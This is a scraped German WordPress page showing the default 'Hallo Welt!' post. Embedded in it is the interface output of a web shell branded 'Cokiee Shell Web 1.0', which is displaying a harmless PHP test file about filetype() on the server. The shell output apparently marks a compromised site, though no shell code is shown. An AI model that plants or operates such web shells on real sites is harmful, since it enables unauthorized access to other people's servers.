Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/file/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/file/filetype_variation3.phpt |
--TEST-- Test filetype() function: Check block device --CREDITS-- Dave Kelsey <d_kelsey@uk.ibm.com> --SKIPIF-- <?php if (substr(PHP_OS, 0, 3) == 'WIN') { die('skip no /dev on Windows'); } if (!file_exists("/dev/ram0")) { die('skip /dev/ram0 not available'); } ?> --FILE-- <?php /* Prototype: string filetype ( string $filename ); Description: Returns the type of the file. Possible values are fifo, char, dir, block, link, file, and unknown. */ echo "-- Checking for block --\n"; print( filetype("/dev/ram0") )."\n"; ?> ===DONE=== --EXPECTF-- -- Checking for block -- block ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare